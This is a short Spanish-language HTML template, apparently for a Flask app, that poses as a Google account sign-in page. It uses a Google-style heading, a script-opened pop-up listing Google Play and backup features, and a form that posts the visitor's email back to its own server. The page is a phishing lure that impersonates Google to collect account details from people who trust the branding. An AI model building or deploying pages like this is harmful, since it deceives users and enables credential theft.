<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Accede a tu cuenta</title>
    <h1>Usa tu Cuenta de Google. La cuenta se agregara a este dispocitivo y estara disponible para otras apps de Google </h1> 
</head>
<body>
    <a> Mas informacion sobre el uso de tu cuenta

      <script>
        ventana = window.open ("", "Ventanagoogle", "width=400,height=300");
        ventana.document.write(`
        <h2>El documento funciona mejor con una cuenta de Google</h2>
        <ul> 
          <li> Descarga aplicaciones, musica, juegos y otros contenidos de Google Play</li>
          <li> Realiza una copia de seguridad de tus aplicaciones y contactos</li>
          <li> Activa funciones de proteccion del dispositivo</li>
        </ul>`)
      </script>
      </a>
      <form method="post">
        {{form.hidden_tag()}}

        {{form.email.label}} {{form.email()}}
      </form>
</body>
</html>